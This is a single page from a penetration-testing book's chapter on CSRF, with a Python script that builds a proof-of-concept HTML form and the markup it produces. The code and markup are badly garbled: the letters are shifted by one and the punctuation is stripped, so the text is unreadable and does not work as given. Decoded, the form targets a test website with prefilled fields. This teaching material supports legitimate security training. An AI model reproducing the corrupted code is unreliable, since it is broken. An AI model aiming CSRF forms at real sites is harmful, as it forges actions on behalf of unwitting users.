Page 118 - Hands-On Bug Hunting for Penetration Testers

P. 118

CSRF and Insecure Session Authentication Chapter 6

DPOUFOU #FBVUJGVM4PVQ IUNM IUNM IUNM QBSTFS
IUNM@UBH DPOUFOU GJOE IUNM
GPSN@UBH DPOUFOU OFX@UBH GPSN BDUJPO BDUJPO NFUIPE NFUIPE
FODUZQF FODPEJOH@UZQF
IUNM@UBH BQQFOE GPSN@UBH

GPS GJFME JO GJFMET
MBCFM@UBH DPOUFOU OFX@UBH MBCFM
MBCFM@UBH TUSJOH GJFME< MBCFM >
GJFME@UBH DPOUFOU OFX@UBH JOQVU UZQF GJFME< UZQF >
WBMVF GJFME< WBMVF >
GJFME@UBH< OBNF > GJFME< OBNF >
GPSN@UBH BQQFOE MBCFM@UBH
GPSN@UBH BQQFOE GJFME@UBH

TVCNJU@UBH DPOUFOU OFX@UBH JOQVU UZQF TVCNJU WBMVF BDUJPO
GPSN@UBH BQQFOE TVCNJU@UBH

SFUVSO DPOUFOU QSFUUJGZ

JG @@OBNF@@ @@NBJO@@
QSJOU HFOFSBUF@QPD

If you're familiar with Python, you'll notice the logic is wrapped in a function and then
bootstrapped in the JG @@OBNF@@ @@NBJO@@ conditional so that we get the
expected behavior when we run the script from the command line (the HTML is printed to
45%065). At the same time, we can build other Python modules that import the
HFOFSBUF@QPD function without side-effects.

All of this generates the following markup:

IUNM
GPSN BDUJPO IUUQ XFCTDBOUFTU DPN DSPTTUSBJOJOH BCPVUZPV QIQ
FODUZQF BQQMJDBUJPO Y XXX GPSN VSMFODPEFE NFUIPE 1045
MBCFM GOBNF MBCFM JOQVU OBNF GOBNF UZQF UFYU WBMVF 8JMMJBN
MBCFM MOBNF MBCFM JOQVU OBNF MOBNF UZQF UFYU WBMVF .BOEFMMB
MBCFM OJDL MBCFM JOQVU OBNF OJDL UZQF UFYU WBMVF .BKPS
.BOEFMMB
JOQVU UZQF TVCNJU
WBMVF IUUQ XFCTDBOUFTU DPN DSPTTUSBJOJOH BCPVUZPV QIQ
GPSN
IUNM

[ 103 ]

113 114 115 116 117 118 119 120 121 122 123